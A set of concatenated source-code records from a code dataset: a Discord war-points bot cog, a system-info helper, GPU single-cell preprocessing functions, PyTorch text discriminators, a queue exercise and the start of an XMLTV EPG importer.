''\n try: #[] RULE\n # first assume nickname with [TAG] name\n test = allianceId = message.author.nick.split(']')[1]\n allianceId = message.author.nick.split(']')[0][1::]\n name = message.author.nick.split(' ')[1]\n except:\n try:\n # If failed assume name with [TAG] name\n test = allianceId = message.author.name.split(']')[1]\n allianceId = message.author.name.split(']')[0][1::]\n name = message.author.name.split(' ')[1]\n except:\n try:\n # If failed assume nickname with [TAG]name\n test = allianceId = message.author.nick.split(']')[1]\n allianceId = message.author.nick.split(']')[0][1::]\n name = message.author.nick.split(']')[1]\n except:\n try:\n # If failed assume name with [TAG]name\n test = allianceId = message.author.name.split(']')[1]\n allianceId = message.author.name.split(']')[0][1::]\n name = message.author.name.split(']')[1]\n except:\n try: #() RULE\n # first assume nickname with (TAG) name\n test = allianceId = message.author.nick.split(')')[1]\n allianceId = message.author.nick.split(')')[0][1::]\n name = message.author.nick.split(' ')[1]\n except:\n try:\n # If failed assume name with (TAG) name\n test = allianceId = message.author.name.split(')')[1]\n allianceId = message.author.name.split(')')[0][1::]\n name = message.author.name.split(' ')[1]\n except:\n try:\n # If failed assume name with (TAG)name\n test = allianceId = message.author.name.split(')')[1]\n allianceId = message.author.name.split(')')[0][1::]\n name = message.author.name.split(')')[1]\n except:\n try: #< RULE\n # first assume nickname with name\n test = allianceId = message.author.nick.split('>')[1]\n allianceId = message.author.nick.split('>')[0][1::]\n name = message.author.nick.split(' ')[1]\n except:\n try:\n # If failed assume name with name\n test = allianceId = message.author.name.split('>')[1]\n allianceId = message.author.name.split('>')[0][1::]\n name = message.author.name.split(' ')[1]\n except:\n try:\n # If failed assume name with name\n test = allianceId = message.author.name.split('>')[1]\n allianceId = message.author.name.split('>')[0][1::]\n name = message.author.name.split('>')[1]\n except:\n #user is doing somewhere wierd... acccept it\n allianceId = '???'\n name = message.author.name\n\n\n incrementMemberKillCount(message.guild.id, message.author.id, name, allianceId)\n killCount = getKillCount(message.author.id)\n msg = '.\\n{}, your **kill** has been recorded :smiling_imp:'.format(message.author.mention)\n msg += '\\n```Kill Count: {}```'.format(killCount)\n await message.channel.send(msg)\n\n await self.bot.process_commands(message)\n\n\n\n @commands.command()\n async def warpointoverride(self, ctx):\n if ctx.message.author.name.lower() != 'bop':\n return\n\n if len(ctx.message.mentions) > 0:\n member = ctx.message.mentions[0]\n\n allianceId = ''\n name = ''\n try: \n allianceId = member.nick.split(']')[0][1::]\n name = member.nick.split(' ')[1]\n except:\n allianceId = member.name.split(']')[0][1::]\n try:\n name = member.name.split(' ')[1]\n except:\n name = member.name.split(']')[1]\n\n incrementMemberKillCount(ctx.guild.id, member.id, name, allianceId)\n killCount = getKillCount(member.id)\n msg = \".\\n{}, {}'s **kill** has been recorded :smiling_imp:\".format(ctx.message.author.mention, member.name)\n msg += '\\n```{} Kill Count: {}```'.format(member.name, killCount)\n await ctx.message.channel.send(msg)\n\n\n @commands.command()\n async def mywarpoints(self, ctx):\n if ctx.guild.id != 524400503967187011:\n return\n\n killCount = getKillCount(ctx.message.author.id)\n msg = '.\\n{}, your **kill** count is below :smiling_imp:'.format(ctx.message.author.mention)\n msg += '\\n```Kill Count: {}```'.format(killCount)\n await ctx.message.channel.send(msg)\n\n\n @commands.command()\n async def warpoints(self, ctx, allianceId=''):\n\n isAdmin = ctx.message.author.guild_permissions.administrator\n\n if allianceId.lower() == 'begin':\n # ERROR: Admin required to spin up warpoints\n if not isAdmin:\n await ctx.message.channel.send('{}, you must be an admin on this server to spin up warpoints.'.format(ctx.message.author.mention))\n return\n\n setWarPointsChannel(ctx.guild.id, ctx.channel.name)\n msg = '.\\n{}, This channel **({})** has been set up for warpoints.'.format(ctx.message.author.mention, ctx.channel.name)\n msg += '\\n`**Screenshots of kills will now be recorded here** :smiling_imp:'\n await ctx.message.channel.send(msg)\n return\n\n # if allianceId.lower() == 'reset':\n # # ERROR: Admin required to spin up warpoints\n # if not isAdmin:\n # await ctx.message.channel.send('{}, you must be an admin on this server to reset alliance warpoints.'.format(ctx.message.author.mention))\n # return\n\n # resetWarPoints(ctx.guild.id)\n # msg = '.\\n{}, All warpoints have been reset for your alliance.'.format(ctx.message.author.mention)\n # await ctx.message.channel.send(msg)\n # return\n\n title = getAllianceName(ctx.guild.id)\n spacer = '\\n--------------------------------------------------\\n'\n\n # function to check that reaction is from user who called this command\n def checkUser(reaction, user):\n return user == ctx.message.author\n \n # violations is paged, so we need some variables to help do that correctly\n idx = 0\n maxPage = 15\n page = 1\n numPages = 1\n intro = '[OPENING] Secure connection...\\n*Transmitting* sensitive data.. ...\\n\\n'\n\n # check to see if a specific player or alliance was mentioned, to add to the query\n alliance = ''\n if (allianceId):\n alliance = allianceId.upper()\n\n # get this servers violations, and determine number of pages\n results = getMemberKillCounts(ctx.guild.id, alliance)\n allianceTotal = getTotalKillCounts(ctx.guild.id)\n numPages = m.ceil(len(results) / maxPage)\n pageEnd = maxPage if len(results) >= maxPage else len(results)\n\n\n killList = getFormattedMemberKillCounts(results[idx:pageEnd])\n embed = discord.Embed(title='**Member Kill Counts**', description=intro+spacer+killList+spacer[1::], color=000000)\n embed.set_author(name=title, icon_url=ctx.guild.icon_url)\n embed.set_footer(text='SECURE CONNECTION: true | Total Kills:{} | pg {}/{}'.format(allianceTotal, page, numPages))\n msg = await ctx.send(embed=embed)\n\n try:\n while True:\n killList = getFormattedMemberKillCounts(results[idx:pageEnd])\n embed = discord.Embed(title='**Member Kill Counts**', description=intro+spacer+killList+spacer[1::], color=000000)\n embed.set_author(name=title, icon_url=ctx.guild.icon_url)\n embed.set_footer(text='SECURE CONNECTION: true | Total Kills:{} | pg {}/{}'.format(allianceTotal, page, numPages))\n await msg.edit(embed=embed)\n\n\n if page > 1:\n await msg.add_reaction(emoji=self.prev)\n if page * maxPage < len(results):\n await msg.add_reaction(emoji=self.next)\n\n reaction, user = await self.bot.wait_for('reaction_add', timeout=120.0, check=checkUser)\n\n # page the results forward, reset page number, page end, and the index\n if reaction.emoji == self.next:\n page += 1\n idx = pageEnd\n pageEnd = (page * maxPage) if len(results) >= (page * maxPage) else len(results)\n\n # page the results backwards, reset page number, page end, and the index\n if reaction.emoji == self.prev:\n page -= 1\n pageEnd = idx\n idx = pageEnd - maxPage\n\n # clear ALL reactions, reset state of interface.\n await msg.clear_reactions()\n return\n\n # UH OH TIMED OUT\n except asyncio.TimeoutError:\n embed = discord.Embed(title='**Member Kill Counts**', description=intro+spacer+killList+spacer[1::], color=000000)\n embed.set_author(name=title, icon_url=ctx.guild.icon_url)\n embed.set_footer(text='CONNECTION CLOSED: Session timed out')\n msg = await msg.edit(embed=embed)\n await msg.clear_reactions()\n return\n\n\n\n\n\n# set the cog up\ndef setup(bot):\n bot.add_cog(WarCog(bot))\n","sub_path":"bot/cogs/war.py","file_name":"war.py","file_ext":"py","file_size_in_byte":11672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"341559456","text":"from ._version import __version__\nimport platform\nimport psutil\nimport os\nimport sys\nimport socket\n\nclass System:\n\n def get_networks(self):\n interfaces = psutil.net_if_addrs()\n results = {}\n for interface in interfaces:\n if interface == 'lo': continue\n print(interface)\n results[interface] = { \"mac\": None, \"ip\": None}\n for sni in interfaces[interface]:\n if sni.family == socket.AF_PACKET:\n results[interface][\"mac\"] = sni.address\n if sni.family == socket.AF_INET:\n results[interface][\"ip\"] = sni.address\n return results\n\n def info(self):\n return {\n \"version\": __version__,\n \"os\": platform.platform(),\n \"hostname\": platform.node(),\n \"network\": self.get_networks(),\n \"python\": {\n \"version\": sys.version.partition(\"\\n\")[0]\n },\n \"node\": {\n \"version\": os.popen(\"node --version\").read().partition(\"\\n\")[0]\n },\n \"uptime\": os.popen('uptime -p').read()[:-1]\n }","sub_path":"senseapp/system.py","file_name":"system.py","file_ext":"py","file_size_in_byte":1141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"350947538","text":"#\n# Copyright (c) 2020, NVIDIA CORPORATION.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\nimport cupy as cp\nimport cudf\n\nimport numpy as np\nimport scipy\nimport math\n\nfrom cuml.linear_model import LinearRegression\n\n\ndef scale(normalized, max_value=10):\n \"\"\"\n Scales matrix to unit variance and clips values\n\n Parameters\n ----------\n\n normalized : cupy.ndarray or numpy.ndarray of shape (n_cells, n_genes)\n Matrix to scale\n max_value : int\n After scaling matrix to unit variance,\n values will be clipped to this number\n of std deviations.\n\n Return\n ------\n\n normalized : cupy.ndarray of shape (n_cells, n_genes)\n Dense normalized matrix\n \"\"\"\n\n normalized = cp.asarray(normalized)\n mean = normalized.mean(axis=0)\n normalized -= mean\n del mean\n stddev = cp.sqrt(normalized.var(axis=0))\n normalized /= stddev\n del stddev\n \n return normalized.clip(a_max=max_value)\n\n\ndef _regress_out_chunk(X, y):\n \"\"\"\n Performs a data_cunk.shape[1] number of local linear regressions,\n replacing the data in the original chunk w/ the regressed result.\n\n Parameters\n ----------\n\n X : cupy.ndarray of shape (n_cells, 3)\n Matrix of regressors\n\n y : cupy.sparse.spmatrix of shape (n_cells,)\n Sparse matrix containing a single column of the cellxgene matrix\n\n Returns\n -------\n\n dense_mat : cupy.ndarray of shape (n_cells,)\n Adjusted column\n \"\"\"\n y_d = y.todense()\n \n lr = LinearRegression(fit_intercept=False, output_type=\"cupy\")\n lr.fit(X, y_d, convert_dtype=True)\n return y_d.reshape(y_d.shape[0],) - lr.predict(X).reshape(y_d.shape[0])\n \n\ndef normalize_total(csr_arr, target_sum):\n \"\"\"\n Normalizes rows in matrix so they sum to `target_sum`\n\n Parameters\n ----------\n\n csr_arr : cupy.sparse.csr_matrix of shape (n_cells, n_genes)\n Matrix to normalize\n\n target_sum : int\n Each row will be normalized to sum to this value\n\n Returns\n -------\n\n csr_arr : cupy.sparse.csr_arr of shape (n_cells, n_genes)\n Normalized sparse matrix\n \"\"\"\n \n mul_kernel = cp.RawKernel(r'''\n extern \"C\" __global__\n void mul_kernel(const int *indptr, float *data, \n int nrows, int tsum) {\n int row = blockDim.x * blockIdx.x + threadIdx.x;\n \n if(row >= nrows)\n return;\n \n float scale = 0.0;\n int start_idx = indptr[row];\n int stop_idx = indptr[row+1];\n\n for(int i = start_idx; i < stop_idx; i++)\n scale += data[i];\n\n if(scale > 0.0) {\n scale = tsum / scale;\n for(int i = start_idx; i < stop_idx; i++)\n data[i] *= scale;\n }\n }\n ''', 'mul_kernel')\n \n mul_kernel((math.ceil(csr_arr.shape[0] / 32.0),), (32,),\n (csr_arr.indptr,\n csr_arr.data,\n csr_arr.shape[0],\n int(target_sum)))\n \n return csr_arr\n\n\ndef regress_out(normalized, n_counts, percent_mito, verbose=False):\n\n \"\"\"\n Use linear regression to adjust for the effects of unwanted noise\n and variation.\n\n Parameters\n ----------\n\n normalized : cupy.sparse.csc_matrix of shape (n_cells, n_genes)\n The matrix to adjust. The adjustment will be performed over\n the columns.\n\n n_counts : cupy.ndarray of shape (n_cells,)\n Number of genes for each cell\n\n percent_mito : cupy.ndarray of shape (n_cells,)\n Percentage of genes that each cell needs to adjust for\n\n verbose : bool\n Print debugging information\n\n Returns\n -------\n\n outputs : cupy.ndarray\n Adjusted matrix\n \"\"\"\n\n regressors = cp.ones((n_counts.shape[0]*3)).reshape((n_counts.shape[0], 3), order=\"F\")\n\n regressors[:, 1] = n_counts\n regressors[:, 2] = percent_mito\n \n outputs = cp.empty(normalized.shape, dtype=normalized.dtype, order=\"F\")\n \n for i in range(normalized.shape[1]):\n if verbose and i % 500 == 0:\n print(\"Regressed %s out of %s\" %(i, normalized.shape[1]))\n X = regressors\n y = normalized[:,i]\n outputs[:, i] = _regress_out_chunk(X, y)\n \n return outputs\n\n\ndef filter_cells(sparse_gpu_array, min_genes, max_genes, rows_per_batch=10000, barcodes=None):\n \"\"\"\n Filter cells that have genes greater than a max number of genes or less than\n a minimum number of genes.\n\n Parameters\n ----------\n\n sparse_gpu_array : cupy.sparse.csr_matrix of shape (n_cells, n_genes)\n CSR matrix to filter\n\n min_genes : int\n Lower bound on number of genes to keep\n\n max_genes : int\n Upper bound on number of genes to keep\n\n rows_per_batch : int\n Batch size to use for filtering. This can be adjusted for performance\n to trade-off memory use.\n\n barcodes : series\n cudf series containing cell barcodes.\n\n Returns\n -------\n\n filtered : scipy.sparse.csr_matrix of shape (n_cells, n_genes)\n Matrix on host with filtered cells\n\n barcodes : If barcodes are provided, also returns a series of \n filtered barcodes.\n \"\"\"\n\n n_batches = math.ceil(sparse_gpu_array.shape[0] / rows_per_batch)\n filtered_list = []\n barcodes_batch = None\n for batch in range(n_batches):\n batch_size = rows_per_batch\n start_idx = batch * batch_size\n stop_idx = min(batch * batch_size + batch_size, sparse_gpu_array.shape[0])\n arr_batch = sparse_gpu_array[start_idx:stop_idx]\n if barcodes is not None:\n barcodes_batch = barcodes[start_idx:stop_idx]\n filtered_list.append(_filter_cells(arr_batch, \n min_genes=min_genes, \n max_genes=max_genes, \n barcodes=barcodes_batch))\n\n if barcodes is None:\n return scipy.sparse.vstack(filtered_list)\n else:\n filtered_data = [x[0] for x in filtered_list]\n filtered_barcodes = [x[1] for x in filtered_list]\n filtered_barcodes = cudf.concat(filtered_barcodes)\n return scipy.sparse.vstack(filtered_data), filtered_barcodes.reset_index(drop=True)\n\n\ndef _filter_cells(sparse_gpu_array, min_genes, max_genes, barcodes=None):\n degrees = cp.diff(sparse_gpu_array.indptr)\n query = ((min_genes <= degrees) & (degrees <= max_genes)).ravel()\n query = query.get()\n if barcodes is None:\n return sparse_gpu_array.get()[query]\n else:\n return sparse_gpu_array.get()[query], barcodes[query]\n\n\ndef filter_genes(sparse_gpu_array, genes_idx, min_cells=0):\n \"\"\"\n Filters out genes that contain less than a specified number of cells\n\n Parameters\n ----------\n\n sparse_gpu_array : scipy.sparse.csr_matrix of shape (n_cells, n_genes)\n CSR Matrix to filter\n\n genes_idx : cudf.Series or pandas.Series of size (n_genes,)\n Current index of genes. These must map to the indices in sparse_gpu_array\n\n min_cells : int\n Genes containing a number of cells below this value will be filtered\n \"\"\"\n thr = np.asarray(sparse_gpu_array.sum(axis=0) >= min_cells).ravel()\n filtered_genes = cp.sparse.csr_matrix(sparse_gpu_array[:, thr])\n genes_idx = genes_idx[np.where(thr)[0]]\n \n return filtered_genes, genes_idx.reset_index(drop=True)\n\n\ndef select_groups(labels, groups_order_subset='all'):\n adata_obs_key = labels\n groups_order = labels.cat.categories\n groups_masks = cp.zeros(\n (len(labels.cat.categories), len(labels.cat.codes)), dtype=bool\n )\n for iname, name in enumerate(labels.cat.categories):\n # if the name is not found, fallback to index retrieval\n if labels.cat.categories[iname] in labels.cat.codes:\n mask = labels.cat.categories[iname] == labels.cat.codes\n else:\n mask = iname == labels.cat.codes\n groups_masks[iname] = mask.values\n groups_ids = list(range(len(groups_order)))\n if groups_order_subset != 'all':\n groups_ids = []\n for name in groups_order_subset:\n groups_ids.append(\n cp.where(cp.array(labels.cat.categories.to_array().astype(\"int32\")) == int(name))[0][0]\n )\n if len(groups_ids) == 0:\n # fallback to index retrieval\n groups_ids = cp.where(\n cp.in1d(\n cp.arange(len(labels.cat.categories)).astype(str),\n cp.array(groups_order_subset),\n )\n )[0]\n \n groups_ids = [groups_id.item() for groups_id in groups_ids]\n groups_masks = groups_masks[groups_ids]\n groups_order_subset = labels.cat.categories[groups_ids].to_array().astype(int)\n else:\n groups_order_subset = groups_order.to_array()\n return groups_order_subset, groups_masks\n\n\ndef rank_genes_groups(\n X,\n labels, # louvain results\n var_names,\n groups=None,\n reference='rest',\n n_genes=100,\n **kwds,\n):\n\n \"\"\"\n Rank genes for characterizing groups.\n\n Parameters\n ----------\n\n X : cupy.ndarray of shape (n_cells, n_genes)\n The cellxgene matrix to rank genes\n\n labels : cudf.Series of size (n_cells,)\n Observations groupings to consider\n\n var_names : cudf.Series of size (n_genes,)\n Names of genes in X\n\n groups : Iterable[str] (default: 'all')\n Subset of groups, e.g. ['g1', 'g2', 'g3'], to which comparison\n shall be restricted, or 'all' (default), for all groups.\n\n reference : str (default: 'rest')\n If 'rest', compare each group to the union of the rest of the group.\n If a group identifier, compare with respect to this group.\n\n n_genes : int (default: 100)\n The number of genes that appear in the returned tables.\n \"\"\"\n\n #### Wherever we see \"adata.obs[groupby], we should just replace w/ the groups\"\n\n import time\n \n start = time.time()\n \n # for clarity, rename variable\n if groups == 'all':\n groups_order = 'all'\n elif isinstance(groups, (str, int)):\n raise ValueError('Specify a sequence of groups')\n else:\n groups_order = list(groups)\n if isinstance(groups_order[0], int):\n groups_order = [str(n) for n in groups_order]\n if reference != 'rest' and reference not in set(groups_order):\n groups_order += [reference]\n if (\n reference != 'rest'\n and reference not in set(labels.cat.categories)\n ):\n cats = labels.cat.categories.tolist()\n raise ValueError(\n f'reference = {reference} needs to be one of groupby = {cats}.'\n )\n\n groups_order, groups_masks = select_groups(labels, groups_order)\n \n original_reference = reference\n \n n_vars = len(var_names)\n\n # for clarity, rename variable\n n_genes_user = n_genes\n # make sure indices are not OoB in case there are less genes than n_genes\n if n_genes_user > X.shape[1]:\n n_genes_user = X.shape[1]\n # in the following, n_genes is simply another name for the total number of genes\n n_genes = X.shape[1]\n\n n_groups = groups_masks.shape[0]\n ns = cp.zeros(n_groups, dtype=int)\n for imask, mask in enumerate(groups_masks):\n ns[imask] = cp.where(mask)[0].size\n if reference != 'rest':\n ireference = cp.where(groups_order == reference)[0][0]\n reference_indices = cp.arange(n_vars, dtype=int)\n\n rankings_gene_scores = []\n rankings_gene_names = []\n\n # Perform LogReg\n \n # if reference is not set, then the groups listed will be compared to the rest\n # if reference is set, then the groups listed will be compared only to the other groups listed\n from cuml.linear_model import LogisticRegression\n reference = groups_order[0]\n if len(groups) == 1:\n raise Exception('Cannot perform logistic regression on a single cluster.')\n grouping_mask = labels.astype('int').isin(cudf.Series(groups_order))\n grouping = labels.loc[grouping_mask]\n \n X = X[grouping_mask.values, :] # Indexing with a series causes issues, possibly segfault\n y = labels.loc[grouping]\n \n clf = LogisticRegression(**kwds)\n clf.fit(X.get(), grouping.to_array().astype('float32'))\n scores_all = cp.array(clf.coef_).T\n \n for igroup, group in enumerate(groups_order):\n if len(groups_order) <= 2: # binary logistic regression\n scores = scores_all[0]\n else:\n scores = scores_all[igroup]\n\n partition = cp.argpartition(scores, -n_genes_user)[-n_genes_user:]\n partial_indices = cp.argsort(scores[partition])[::-1]\n global_indices = reference_indices[partition][partial_indices]\n rankings_gene_scores.append(scores[global_indices].get()) ## Shouldn't need to take this off device\n rankings_gene_names.append(var_names[global_indices].to_pandas())\n if len(groups_order) <= 2:\n break\n\n groups_order_save = [str(g) for g in groups_order]\n if (len(groups) == 2):\n groups_order_save = [g for g in groups_order if g != reference]\n \n print(\"Ranking took (GPU): \" + str(time.time() - start))\n \n start = time.time()\n \n scores = np.rec.fromarrays(\n [n for n in rankings_gene_scores],\n dtype=[(rn, 'float32') for rn in groups_order_save],\n )\n \n names = np.rec.fromarrays(\n [n for n in rankings_gene_names],\n dtype=[(rn, 'U50') for rn in groups_order_save],\n )\n \n print(\"Preparing output np.rec.fromarrays took (CPU): \" + str(time.time() - start))\n print(\"Note: This operation will be accelerated in a future version\")\n \n return scores, names, original_reference\n","sub_path":"notebooks/rapids_scanpy_funcs.py","file_name":"rapids_scanpy_funcs.py","file_ext":"py","file_size_in_byte":14217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"224647092","text":"#-------------------------------------------------------------------------------\n# Name: Lab 5 Exercise4\n# Purpose:\n#\n# Author: Zhao\n#\n# Created: 06/02/2016\n# Copyright: (c) Zhao 2016\n# Licence: \n#-------------------------------------------------------------------------------\nimport bounded_queue\ndef main():\n queue = bounded_queue.BoundedQueue(3)\n request =''\n while request != 'exit':\n request = input('Add, Serve or Exit: ').lower()\n if request not in 'addserveexit':\n print('You need to enter either Add, Serve or Exit')\n continue\n elif request == 'exit':\n print('Quitting,')\n print('Line:',queue)\n break\n elif request == 'add':\n try:\n name = input('Enter the name of the person to add: ')\n print('add ',name,' to the line.')\n queue.enqueue(name)\n except:\n print('Error: Queue is full')\n continue\n finally:\n print('people in the line:',queue)\n elif request == 'serve':\n try:\n queue.dequeue()\n except:\n print('Error: Queue is empty')\n finally:\n print('people in the line:',queue)\n\nif __name__ == '__main__':\n main()\n","sub_path":"Lab5/Exercise4.py","file_name":"Exercise4.py","file_ext":"py","file_size_in_byte":1359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"27203960","text":"import torch\nimport torch.nn as nn\n\nfrom transfer.module.conv import ResBlock\n\n\nclass CNNClassifier(nn.Module):\n def __init__(self, vocab_size, embedding_dim, max_length):\n super(CNNCritic, self).__init__()\n self.embedding = nn.Embedding(vocab_size, embedding_dim)\n self.block = nn.Sequential(\n ResBlock(embedding_dim),\n ResBlock(embedding_dim),\n ResBlock(embedding_dim),\n ResBlock(embedding_dim),\n ResBlock(embedding_dim),\n )\n self.maxpool = nn.MaxPool1d(max_length)\n self.linear = nn.Linear(embedding_dim, 1)\n self.sigmoid = nn.Sigmoid()\n\n def forward(self, inputs, is_discrete=False):\n \"\"\"\n inputs: float tensor, shape = [B, T, vocab_size]\n \"\"\"\n if is_discrete:\n inputs = self.embedding(inputs)\n else:\n batch_size, length, vocab_size = inputs.size()\n inputs = inputs.contiguous().view(-1, vocab_size)\n inputs = torch.mm(inputs, self.embedding.weight)\n inputs = inputs.view(batch_size, length, -1)\n inputs = inputs.transpose(1, 2) # (B, H, T)\n outputs = self.block(inputs) # (B, H, T)\n outputs = self.maxpool(outputs) # (B, H, 1)\n outputs = outputs.squeeze(-1) # (B, H)\n outputs = self.linear(outputs) # (B, 1)\n outputs = self.sigmoid(outputs)\n return outputs\n\n\nclass RNNClassifier(nn.Module):\n def __init__(self, embedding, hidden_size, dropout=0.1, num_layers=1,\n bidirectional=True, cell=nn.GRU):\n super(RNNClassifier, self).__init__()\n if bidirectional:\n self.num_directions = 2\n else:\n self.num_directions = 1\n self.embedding = embedding\n self.hidden_size = hidden_size\n self.num_layers = num_layers\n self.rnn = cell(\n embedding.embedding_dim, hidden_size,\n dropout=(0 if num_layers == 1 else dropout),\n num_layers=num_layers,\n batch_first=True,\n bidirectional=bidirectional)\n self.linear = nn.Linear(hidden_size * self.num_directions, 1)\n self.sigmoid = nn.Sigmoid()\n\n def forward(self, inputs, is_discrete=False):\n \"\"\"\n Args:\n inputs: float tensor, shape = [B x T x vocab_size], probility\n is_discrete: boolean, if True, the inputs shape is [B x T]\n\n Returns:\n loss: float tensor, scalar, binomial probility\n \"\"\"\n if is_discrete:\n inputs = self.embedding(inputs)\n else:\n batch_size, length, vocab_size = inputs.size()\n inputs = inputs.contiguous().view(-1, vocab_size)\n inputs = torch.mm(inputs, self.embedding.weight)\n inputs = inputs.view(batch_size, length, -1)\n _, hidden = self.rnn(inputs)\n if type(hidden) is tuple:\n hidden = hidden[0]\n hidden = hidden.view(\n self.num_layers, self.num_directions, -1, self.hidden_size)\n if self.num_directions == 2:\n outputs = torch.cat(\n [hidden[-1, 0, :, :], hidden[-1, 1, :, :]], dim=-1)\n else:\n outputs = hidden[-1, -1, :, :]\n outputs = self.linear(outputs)\n outputs = self.sigmoid(outputs)\n return outputs\n\n\nclass CNNCritic(nn.Module):\n def __init__(self, embedding, max_length):\n super(CNNCritic, self).__init__()\n self.embedding = embedding\n self.block = nn.Sequential(\n ResBlock(embedding.embedding_dim),\n ResBlock(embedding.embedding_dim),\n ResBlock(embedding.embedding_dim),\n ResBlock(embedding.embedding_dim),\n ResBlock(embedding.embedding_dim),\n )\n self.maxpool = nn.MaxPool1d(max_length)\n self.linear = nn.Linear(embedding.embedding_dim, 1)\n\n def forward(self, inputs, is_discrete=False):\n \"\"\"\n inputs: float tensor, shape = [B, T, vocab_size]\n \"\"\"\n if is_discrete:\n inputs = self.embedding(inputs)\n else:\n batch_size, length, vocab_size = inputs.size()\n inputs = inputs.contiguous().view(-1, vocab_size)\n inputs = torch.mm(inputs, self.embedding.weight)\n inputs = inputs.view(batch_size, length, -1)\n inputs = inputs.transpose(1, 2) # (B, H, T)\n outputs = self.block(inputs) # (B, H, T)\n outputs = self.maxpool(outputs) # (B, H, 1)\n outputs = outputs.squeeze(-1) # (B, H)\n outputs = self.linear(outputs) # (B, 1)\n return outputs\n","sub_path":"transfer/module/discriminator.py","file_name":"discriminator.py","file_ext":"py","file_size_in_byte":4643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"420289081","text":"import sys\nimport os\nimport time\n\n\ndef main():\n env = os.environ\n print(env)\n SLEEP = int(env.get(\"SLEEP\") or 10)\n EXIT_CODE = int(env.get(\"EXIT_CODE\") or 0)\n ARGS = env.get(\"ARGS\") or \"\"\n if ARGS == \"\":\n print(\"$ARGS was not specified as an environment variable.\")\n else:\n print(\"$ARGS are \" + ARGS)\n time.sleep(SLEEP)\n sys.exit(EXIT_CODE)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"code/python/docker/testimage/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"39136813","text":"\"\"\"A hook for modifying parameter values read from the WMT client.\"\"\"\n\nfrom wmt.utils.hook import yaml_dump\nfrom topoflow_utils.hook import assign_parameters\n\n\nfile_list = []\n\n\ndef execute(env):\n \"\"\"Perform pre-stage tasks for running a component.\n\n Parameters\n ----------\n env : dict\n A dict of component parameter values from WMT.\n\n \"\"\"\n env['model_end_year'] = long(env['model_start_year']) \\\n + long(env['_run_duration'])\n\n assign_parameters(env, file_list)\n\n env['_file_list'] = file_list\n yaml_dump('_env.yaml', env)\n","sub_path":"metadata/CMIP/hooks/pre-stage.py","file_name":"pre-stage.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"52049600","text":"#!/usr/bin/env python\n# -*- encoding:utf-8 -*-\n\nfrom django.conf import settings\nfrom django import db\nfrom django.db import transaction\nfrom django.core import serializers\nfrom django.utils.timezone import utc\n\nimport re\nimport zipfile\nimport tempfile\nimport shutil\nfrom lxml import etree\n#from datetime import tzinfo, datetime\nfrom datetime import timedelta, datetime\nfrom dateutil.parser import parse\nfrom pytz import timezone\nfrom types import NoneType\n\nfrom models import *\n\nimport hotshot\nimport time\nimport logging\n\nPROFILE_LOG_BASE = \"/tmp\"\n\n\ndef profile(log_file):\n \"\"\"Profile some callable.\n\n This decorator uses the hotshot profiler to profile some callable (like\n a view function or method) and dumps the profile data somewhere sensible\n for later processing and examination.\n\n It takes one argument, the profile log name. If it's a relative path, it\n places it under the PROFILE_LOG_BASE. It also inserts a time stamp into the\n file name, such that 'my_view.prof' become 'my_view-20100211T170321.prof',\n where the time stamp is in UTC. This makes it easy to run and compare\n multiple trials.\n \"\"\"\n\n if not os.path.isabs(log_file):\n log_file = os.path.join(PROFILE_LOG_BASE, log_file)\n\n def _outer(f):\n def _inner(*args, **kwargs):\n # Add a timestamp to the profile output when the callable\n # is actually called.\n (base, ext) = os.path.splitext(log_file)\n base = base + \"-\" + time.strftime(\"%Y%m%dT%H%M%S\", time.gmtime())\n final_log_file = base + ext\n\n prof = hotshot.Profile(final_log_file)\n try:\n ret = prof.runcall(f, *args, **kwargs)\n finally:\n prof.close()\n return ret\n\n return _inner\n return _outer\n\n\nclass Zip_to_XML(object):\n '''\n This class is used to pre-treat an input file\n that can be a XML, a ZIP with one XML file inside or\n a ZIP file with multiple XML files inside\n '''\n\n def __init__(self, input_file_path):\n import mimetypes\n file_type, encoding = mimetypes.guess_type(input_file_path)\n if file_type == 'application/zip':\n self.input_file = zipfile.ZipFile(input_file_path, 'r')\n self.get_all_files = self._get_zip\n elif file_type in ('application/xhtml+xml', 'text/xml'):\n self.input_file = input_file_path\n self.get_all_files = self._get_xml\n else:\n raise Exception('Unkown type of file to import:', file_type)\n\n # Return one or multiple XML file handles inside a Zip archive\n def _get_zip(self):\n ret = []\n for f in self.input_file.namelist():\n filename = os.path.basename(f)\n\n # skip directories\n if not filename:\n continue\n\n # copy file (taken from zipfile's extract)\n source = self.input_file.open(f)\n target = file(os.path.join('/tmp', filename), \"w+\")\n shutil.copyfileobj(source, target)\n source.close()\n target.seek(0)\n\n ret.append(target)\n return ret\n\n # Return a file handle of a XML file\n def _get_xml(self):\n return (open(self.input_file),)\n\n\nclass XML_Epg_Importer(object):\n '''\n Used to import XMLTV compliant files to the database.\n It receives a XML file handle as input.\n Imports xml into xmltv_source object\n '''\n\n def __init__(self, xml, xmltv_source=None, epg_source=None,\n log=open('/dev/null', 'w')):\n log = logging.getLogger('epg_import')\n self.xmltv_source = xmltv_source\n self.epg_source = epg_source\n self.xml = xml\n self.log = log\n\n self.tree = etree.parse(self.xml.name)\n # get number of elements\n self.total_channel = self.tree.xpath(\"count(//channel)\")\n self.total_programme = self.tree.xpath(\"count(//programme)\")\n log.info('channel=%d , programme=%d', self.total_channel,\n self.total_programme)\n self.epg_source.numberofElements += \\\n self.total_channel +\\\n self.total_programme\n # get meta data\n self.xmltv_source.generator_info_name = \\\n 